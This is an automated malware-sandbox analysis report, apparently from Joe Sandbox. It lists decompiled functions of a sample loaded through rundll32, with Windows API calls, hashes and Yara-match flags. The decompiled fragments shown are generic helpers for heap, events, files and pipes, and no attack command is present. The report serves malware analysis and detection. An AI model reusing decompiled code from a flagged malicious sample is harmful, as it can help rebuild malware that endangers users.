                                                          • Instruction ID: 44d55736c97cfc0a5333d6e6460a1eab2570fa99aabb01a574e2603fadecca38
                                                          • Opcode Fuzzy Hash: dfe196441ef800c98f93bd20d30e0ebb958d58c7a970e6ed62b87351c9ab585b
                                                          • Instruction Fuzzy Hash: A401C876A00345EFC751ABA8EC48E5FBBFDAB88205F050465EE4AE3241DA30D508CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06289E10 Relevance: 6.0, APIs: 4, Instructions: 50memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,765BD3B0,?,76C85520,0627B697,00000000,?,?,?,76CDF710,00000000,00000000), ref: 06289E17
                                                          • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 06289E2F
                                                          • memcpy.NTDLL(0000000C,?,00000001), ref: 06289E45
                                                            • Part of subcall function 0627A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,0689C304,00000000,?,06276584,?), ref: 0627A90E
                                                            • Part of subcall function 0627A8E9: StrTrimA.SHLWAPI(00000020,06295FCC,00000000,?,06276584,?), ref: 0627A92D
                                                            • Part of subcall function 0627A8E9: StrChrA.SHLWAPI(00000020,?,?,06276584,?), ref: 0627A939
                                                          • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 06289E77
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3208927540-0
                                                          • Opcode ID: 1a3d2f3c2fbff560f36d27274cd53b531fdc8378ffd482f738dd469b516352e3
                                                          • Instruction ID: 8612e77c9e3ab7b11b807d322129b1b3a2f3317ce13e2e13a62f69befaf27f00
                                                          • Opcode Fuzzy Hash: 1a3d2f3c2fbff560f36d27274cd53b531fdc8378ffd482f738dd469b516352e3
                                                          • Instruction Fuzzy Hash: A2018831A11702AFE3615F56EC49F3B7F99FBC4751F044426FB19A5080D7B19849DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06285261 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • RtlInitializeCriticalSection.NTDLL(0629A400), ref: 06285285
                                                          • RtlInitializeCriticalSection.NTDLL(0629A3E0), ref: 0628529B
                                                          • GetVersion.KERNEL32(?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062852AC
                                                          • GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 062852E0
                                                            • Part of subcall function 062868AC: GetModuleHandleA.KERNEL32(?,00000001,773D9EB0,00000000,?,?,?,?,00000000,062852C3), ref: 062868C4
                                                            • Part of subcall function 062868AC: LoadLibraryA.KERNEL32(?), ref: 06286965
                                                            • Part of subcall function 062868AC: FreeLibrary.KERNEL32(00000000), ref: 06286970
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                                                          • String ID:
                                                          • API String ID: 1711133254-0
                                                          • Opcode ID: c4afab7d67266bcd7ee3851107bea8ae802acfe3c21775feb1f140e374ef7ca8
                                                          • Instruction ID: f5a6dcb8469e3e26c62d450495a343a39805a2ea4d57236acdcdcaeaefbe7ced
                                                          • Opcode Fuzzy Hash: c4afab7d67266bcd7ee3851107bea8ae802acfe3c21775feb1f140e374ef7ca8
                                                          • Instruction Fuzzy Hash: DE118071E613109FEB90AFB9BC8C68537A6F7CA214700053AEB15D7240D7B84884CFB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06272530 Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0629A428), ref: 0627253B
                                                          • Sleep.KERNEL32(0000000A), ref: 06272545
                                                          • SetEvent.KERNEL32 ref: 0627259C
                                                          • RtlLeaveCriticalSection.NTDLL(0629A428), ref: 062725BB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterEventLeaveSleep
                                                          • String ID:
                                                          • API String ID: 1925615494-0
                                                          • Opcode ID: f7b772cd0c2e23f71910703553d56c54250e1a041b1caafd9a2a1be69a9a102d
                                                          • Instruction ID: a997cef08ae76dbd385630129caac4899afd9975e49c668ae4aadc1149af8648
                                                          • Opcode Fuzzy Hash: f7b772cd0c2e23f71910703553d56c54250e1a041b1caafd9a2a1be69a9a102d
                                                          • Instruction Fuzzy Hash: 52019670A61305EBDB41AB61FC5DF5A3AADEB84755F004011EB06E6180D6749604CFB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06277BD8 Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06290DDD: lstrlen.KERNEL32(?,?,00000000,06277BEE), ref: 06290DE2
                                                            • Part of subcall function 06290DDD: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 06290DF7
                                                            • Part of subcall function 06290DDD: wsprintfA.USER32 ref: 06290E13
                                                            • Part of subcall function 06290DDD: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 06290E2F
                                                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 06277C06
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 06277C15
                                                          • CloseHandle.KERNEL32(00000000), ref: 06277C1F
                                                          • GetLastError.KERNEL32 ref: 06277C27
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4042893638-0
                                                          • Opcode ID: 444c99997e391c1153692d3a640cc39ac0917173b63afe46bf80f3028f4f703b
                                                          • Instruction ID: 0bfa9af15566883e98c6017f83fcf579c4d86e4c1b9d084d618c6432c87d08d7
                                                          • Opcode Fuzzy Hash: 444c99997e391c1153692d3a640cc39ac0917173b63afe46bf80f3028f4f703b
                                                          • Instruction Fuzzy Hash: AFF0D171611314BADBA12A65EC8DF9B7E6DEF89AA6F104129FA09A50C0C6704550CAF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06284A4B Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 06284A5D
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0627F3DB
                                                            • Part of subcall function 0627F39B: GetLastError.KERNEL32 ref: 0627F3E5
                                                            • Part of subcall function 0627F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0627F40A
                                                            • Part of subcall function 0627F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0627F42D
                                                            • Part of subcall function 0627F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0627F455
                                                            • Part of subcall function 0627F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0627F46A
                                                            • Part of subcall function 0627F39B: SetEndOfFile.KERNEL32(00001000), ref: 0627F477
                                                            • Part of subcall function 0627F39B: CloseHandle.KERNEL32(00001000), ref: 0627F48F
                                                          • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,0627E4AF,?,?,00001000,?,?,00001000), ref: 06284A80
                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,0627E4AF,?,?,00001000,?,?,00001000), ref: 06284AA2
                                                          • GetLastError.KERNEL32(?,0627E4AF,?,?,00001000,?,?,00001000), ref: 06284AB6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                                          • String ID:
                                                          • API String ID: 3370347312-0
                                                          • Opcode ID: a56c3d189caa8fe0e7063fb8d03ca9ddbc1fc13998c9ff94641895fe03451631
                                                          • Instruction ID: cb5a8bf31f2113c8ba77d0c929f491458d80e555c5eedd8e83bfa2ebb9be7c20
                                                          • Opcode Fuzzy Hash: a56c3d189caa8fe0e7063fb8d03ca9ddbc1fc13998c9ff94641895fe03451631
                                                          • Instruction Fuzzy Hash: 27F0A431215306BFEB526E60AC1DF5A3A56AF45310F100124FF06A80D0E7715161CBBA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 062788FA Relevance: 6.0, APIs: 4, Instructions: 41memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(0629A060,00000000), ref: 06278906
                                                          • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 06278921
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 0627894A
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0627896B
                                                            • Part of subcall function 0627DC41: SetEvent.KERNEL32(00000000,?,0628507B), ref: 0627DC56
                                                            • Part of subcall function 0627DC41: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0628507B), ref: 0627DC76
                                                            • Part of subcall function 0627DC41: CloseHandle.KERNEL32(00000000,?,0628507B), ref: 0627DC7F
                                                            • Part of subcall function 0627DC41: CloseHandle.KERNEL32(00000000,?,?,0628507B), ref: 0627DC89
                                                            • Part of subcall function 0627DC41: RtlEnterCriticalSection.NTDLL(?), ref: 0627DC91
                                                            • Part of subcall function 0627DC41: RtlLeaveCriticalSection.NTDLL(?), ref: 0627DCA9
                                                            • Part of subcall function 0627DC41: CloseHandle.KERNEL32(00000000), ref: 0627DCC5
                                                            • Part of subcall function 0627DC41: LocalFree.KERNEL32(?), ref: 0627DCD0
                                                            • Part of subcall function 0627DC41: RtlDeleteCriticalSection.NTDLL(?), ref: 0627DCDA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                                          • String ID:
                                                          • API String ID: 1103286547-0
                                                          • Opcode ID: 4d806d9f8313037ed5ee2e366f0f44055f692dfda3f60595c370b112a3ac7009
                                                          • Instruction ID: 4e5c14e5d7cbf5bb745c846453735c518373b4ea3e8140e98be748114fd492ff
                                                          • Opcode Fuzzy Hash: 4d806d9f8313037ed5ee2e366f0f44055f692dfda3f60595c370b112a3ac7009
                                                          • Instruction Fuzzy Hash: 9FF0AF32750321ABCBA12A26BC0EF463A1AEFC4B65F040424BF09AA280D9759805CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D227F Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D227F(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                          0x036d2289
                                                          0x036d228d
                                                          0x036d22a2
                                                          0x036d22a4
                                                          0x036d22a9
                                                          0x036d22af
                                                          0x036d22b1
                                                          0x036d22b6
                                                          0x036d22c1
                                                          0x036d22b8
                                                          0x036d22b8
                                                          0x036d22b8
                                                          0x036d22b6
                                                          0x036d22cf

                                                          APIs
                                                          • memset.NTDLL ref: 036D228D
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76CC81D0,00000000,00000000), ref: 036D22A2
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 036D22AF
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?), ref: 036D22C1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 6d97645fae3de65cfb56f7b5c51ad03e2b43d017ab3fef4c473ec37672dbaa03
                                                          • Instruction ID: 4f54fea6dd435b949065fad0acc569494c24f57aa8ebb50fa503272bf4363099
                                                          • Opcode Fuzzy Hash: 6d97645fae3de65cfb56f7b5c51ad03e2b43d017ab3fef4c473ec37672dbaa03
                                                          • Instruction Fuzzy Hash: 99F054B150530C7FD310AF61ECC4C27FBDCEB461A8B114D2DF14292515C671A8158A70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628D5F3 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.NTDLL ref: 0628D601
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0627DB8C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0628D616
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,06273EC6,?,?), ref: 0628D623
                                                          • CloseHandle.KERNEL32(?,?,?,?,06273EC6,?,?), ref: 0628D635
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEvent$CloseHandlememset
                                                          • String ID:
                                                          • API String ID: 2812548120-0
                                                          • Opcode ID: 2edee5cc2fa5f92b07766b114faa98bf22cf32f174d9163d13bbf23fa59e8735
                                                          • Instruction ID: 66e8bd4e5281cc1b5b377ebb3821555d74bd956bbf0f643b68650abb45225819
                                                          • Opcode Fuzzy Hash: 2edee5cc2fa5f92b07766b114faa98bf22cf32f174d9163d13bbf23fa59e8735
                                                          • Instruction Fuzzy Hash: 38F0BEB151131D7FD3206F26ECC4C27BBECEF86298B154D2EF14682180C671A808CEB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06284AC4 Relevance: 6.0, APIs: 4, Instructions: 39filesynchronizationpipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,06274BD6,000000FF,0689B7F0,?,?,0628B7F2,0000003A,0689B7F0), ref: 06284AE0
                                                          • GetLastError.KERNEL32(?,?,0628B7F2,0000003A,0689B7F0,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C,00000008), ref: 06284AEB
                                                          • WaitNamedPipeA.KERNEL32(00002710), ref: 06284B0D
                                                          • WaitForSingleObject.KERNEL32(00000000,?,?,0628B7F2,0000003A,0689B7F0,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C), ref: 06284B1B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                                                          • String ID:
                                                          • API String ID: 4211439915-0
                                                          • Opcode ID: a0552cdd03a0045294c97e22805ef8873dff80e02ff920a9f4b266656733da20
                                                          • Instruction ID: 32bb937de46c398d5c31ffc8c180ec61a79c86f3c76a42db69fe0bf817bb8980
                                                          • Opcode Fuzzy Hash: a0552cdd03a0045294c97e22805ef8873dff80e02ff920a9f4b266656733da20
                                                          • Instruction Fuzzy Hash: 98F06231E12322AFE7613A65BC4DB5A7A96DF85369F154226FF09A61D0C6600840CAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06290DDD Relevance: 6.0, APIs: 4, Instructions: 38memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000,06277BEE), ref: 06290DE2
                                                          • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 06290DF7
                                                          • wsprintfA.USER32 ref: 06290E13
                                                            • Part of subcall function 0628C01F: memset.NTDLL ref: 0628C034
                                                            • Part of subcall function 0628C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0628C06D
                                                            • Part of subcall function 0628C01F: wcstombs.NTDLL ref: 0628C077
                                                            • Part of subcall function 0628C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0628C0A8
                                                            • Part of subcall function 0628C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0D4
                                                            • Part of subcall function 0628C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0628C0EA
                                                            • Part of subcall function 0628C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0627A645), ref: 0628C0FE
                                                            • Part of subcall function 0628C01F: CloseHandle.KERNEL32(?), ref: 0628C131
                                                            • Part of subcall function 0628C01F: CloseHandle.KERNEL32(?), ref: 0628C136
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 06290E2F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                                                          • String ID:
                                                          • API String ID: 1624158581-0
                                                          • Opcode ID: 324e10731e34b4f950f494ac2011ea7a62971fbfab5218edae02ad5697d1aff7
                                                          • Instruction ID: 4f2d23e8a80367208e2236b8c2977cac1396492d592b3d20d98da9d24425cc66
                                                          • Opcode Fuzzy Hash: 324e10731e34b4f950f494ac2011ea7a62971fbfab5218edae02ad5697d1aff7
                                                          • Instruction Fuzzy Hash: B0F0BE32601210BBC7211B2ABC0DF5B7BAEEBC6B65F090125FB05E6291D6208849CEB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06276537 Relevance: 6.0, APIs: 4, Instructions: 30sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 06276540
                                                          • Sleep.KERNEL32(0000000A), ref: 0627654A
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06276572
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06276590
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: b28972aca767e216d9f7d9aac33a7c41d58b44083b8d6958abd296f1c5f395c5
                                                          • Instruction ID: 8b6a683b9a9d932027a92d0d6a2333bcf2b2b15cf34a00fb3c66f9635e2f0f4a
                                                          • Opcode Fuzzy Hash: b28972aca767e216d9f7d9aac33a7c41d58b44083b8d6958abd296f1c5f395c5
                                                          • Instruction Fuzzy Hash: DBF05E70610342DFE7619B29FC4DF1A3BA6AF84344F048414FA06EA152D730E844DF39
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D7607 Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E036D7607() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x36da30c; // 0x2cc
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x36da35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x36da30c; // 0x2cc
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x36da2d8; // 0x5570000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                          0x036d7607
                                                          0x036d760e
                                                          0x036d7658
                                                          0x036d765a
                                                          0x036d765a
                                                          0x036d7612
                                                          0x036d7618
                                                          0x036d761d
                                                          0x036d7621
                                                          0x036d7627
                                                          0x036d762e
                                                          0x00000000
                                                          0x00000000
                                                          0x036d7630
                                                          0x036d7635
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d7635
                                                          0x036d7637
                                                          0x036d763f
                                                          0x036d7642
                                                          0x036d7642
                                                          0x036d7648
                                                          0x036d764f
                                                          0x036d7652
                                                          0x036d7652
                                                          0x00000000

                                                          APIs
                                                          • SetEvent.KERNEL32(000002CC,00000001,036D5E70), ref: 036D7612
                                                          • SleepEx.KERNEL32(00000064,00000001), ref: 036D7621
                                                          • CloseHandle.KERNEL32(000002CC), ref: 036D7642
                                                          • HeapDestroy.KERNEL32(05570000), ref: 036D7652
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseDestroyEventHandleHeapSleep
                                                          • String ID:
                                                          • API String ID: 4109453060-0
                                                          • Opcode ID: 6dee44a64a0d34f0bf4b140cfb17050b8903bc24821b6bff7899bb72afc9096b
                                                          • Instruction ID: f1704707fb6956141f5d521019c2ef3a4452c9cd12d1091743d365e484307620
                                                          • Opcode Fuzzy Hash: 6dee44a64a0d34f0bf4b140cfb17050b8903bc24821b6bff7899bb72afc9096b
                                                          • Instruction Fuzzy Hash: 08F08C30E0725287DB20AF7EF94CA5237D8AB14761B0D1104BC00D378DEB30C460D9A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D72C7 Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E036D72C7() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x36da3cc; // 0x59695b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x36da3cc; // 0x59695b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x36da3cc; // 0x59695b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x36db827) {
					HeapFree( *0x36da2d8, 0, _t10);
					_t7 =  *0x36da3cc; // 0x59695b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                          0x036d72c7
                                                          0x036d72d0
                                                          0x036d72e0
                                                          0x036d72e0
                                                          0x036d72e5
                                                          0x036d72ea
                                                          0x00000000
                                                          0x00000000
                                                          0x036d72da
                                                          0x036d72da
                                                          0x036d72ec
                                                          0x036d72f1
                                                          0x036d72f5
                                                          0x036d7308
                                                          0x036d730e
                                                          0x036d730e
                                                          0x036d7317
                                                          0x036d7319
                                                          0x036d731d
                                                          0x036d7323

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(05969570), ref: 036D72D0
                                                          • Sleep.KERNEL32(0000000A), ref: 036D72DA
                                                          • HeapFree.KERNEL32(00000000), ref: 036D7308
                                                          • RtlLeaveCriticalSection.NTDLL(05969570), ref: 036D731D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: e793b0cb8772cf3f9771ef051f191e7df12163f5b02c42e224890691791cf955
                                                          • Instruction ID: 97e7102756341ffd0f26146d34ee24f51d4d5ee32f3c8cdcc1b01f3ce3b723f3
                                                          • Opcode Fuzzy Hash: e793b0cb8772cf3f9771ef051f191e7df12163f5b02c42e224890691791cf955
                                                          • Instruction Fuzzy Hash: 90F0DA74E062019BE728EF99F949B2577E5AB85300B0A6018FD02D779CC730A821CA19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06290B2C Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 06290B35
                                                          • Sleep.KERNEL32(0000000A), ref: 06290B3F
                                                          • HeapFree.KERNEL32(00000000), ref: 06290B6D
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 06290B82
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: e427bd8600fd81dcac94ecc989d4ee9e912bfa67b382ca60b1b661eecfe831a8
                                                          • Instruction ID: bc53a55f187901c8827f3084cf8767d077a08d0fe040605a1d9add5c47105940
                                                          • Opcode Fuzzy Hash: e427bd8600fd81dcac94ecc989d4ee9e912bfa67b382ca60b1b661eecfe831a8
